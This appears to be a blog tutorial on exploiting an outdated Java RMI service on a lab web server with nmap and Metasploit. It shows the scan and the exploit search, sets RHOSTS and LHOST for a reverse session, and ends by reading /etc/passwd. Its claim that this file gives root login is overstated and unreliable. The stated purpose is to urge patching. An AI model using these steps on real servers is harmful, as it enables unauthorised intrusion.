Java is rarely updating on web servers and so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes, and access the password file.
We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.
In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/
First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.
nmap -sV 192.168.56.103
Next we head over to the metasploit framework to search for any built in exploits we may be able to use.
search type:exploit platform:java rmi
The cmd above is pretty self explanatory, we are performing a search with a type of “exploit” for the platform “java” and addition item “rmi”. We recieve the following output;
To load this module we use the “use” cmd
It informs us it has already selected a payload so next we list the “info” page
Then once we are happy we know what we need to configure we load the options
We can see in the options what is required and what is not by reading the “required” column.
Everything is set for us except the RHOSTS and LHOST settings which we need to ensure have the correct IP address.
- RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
- LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.
We do this by using the “set” cmd
set RHOSTS 192.168.56.103
set LHOST 192.168.56.106
Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.
All we do now in the demo video is run the “sysinfo” cmd to show we are on the victim server, and then we access the password file by using;
“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want. All because no one updated Java!